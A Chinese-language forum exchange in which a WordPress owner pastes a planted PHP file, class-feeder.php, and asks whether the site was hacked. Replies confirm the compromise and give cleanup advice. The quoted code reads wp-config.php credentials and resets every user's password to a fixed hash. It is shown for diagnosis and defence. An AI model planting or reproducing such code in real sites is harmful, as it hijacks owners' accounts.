我非常担心一个文件被添加和访问,它在我的cpanel 中说
我发现include文件夹中添加了这个class-feeder.php,其中有一个小代码,上面写着
<?php
include_once '../wp-config.php';
$con=mysql_connect('localhost',DB_USER,DB_PASSWORD) or die(mysql_error());
mysql_select_db(DB_NAME,$con) or die(mysql_error());
$sql="Update wp_users set user_pass='$"."P"."$"."Bs4sdfEreymQasdfwMzJaasdfasdf4dj20'";
mysql_query($sql,$con) or die(mysql_error());
?>
我被黑客入侵了吗,因为上传文件夹中我的所有图像都是空的,请帮助
是的,你被黑客入侵了。仔细遵循WordPress.org Codex中的常见问题解答-我的网站被黑客入侵,其中包括更改所有密码,检查数据库中的eval代码,替换所有核心WordPress文件和文件夹,评估您的网络主机的安全性,强化WordPress,等等。
看起来此文件正在更新每个密码以使用此哈希Bs4sdfEreymQasdfwMzJaasdfasdf4dj20意味着是的,你的账户(在你的wordpress上)被泄露了。
是的,你被黑客入侵了,只需删除这个奇怪的文件,并尽快更改你的Wp后端、FTP和cpanel凭据。
通常,黑客也会留下一些后门,以便再次访问网站,所以也可以在你的worpress文件中查找eval,并确定是否存在其他奇怪的文件。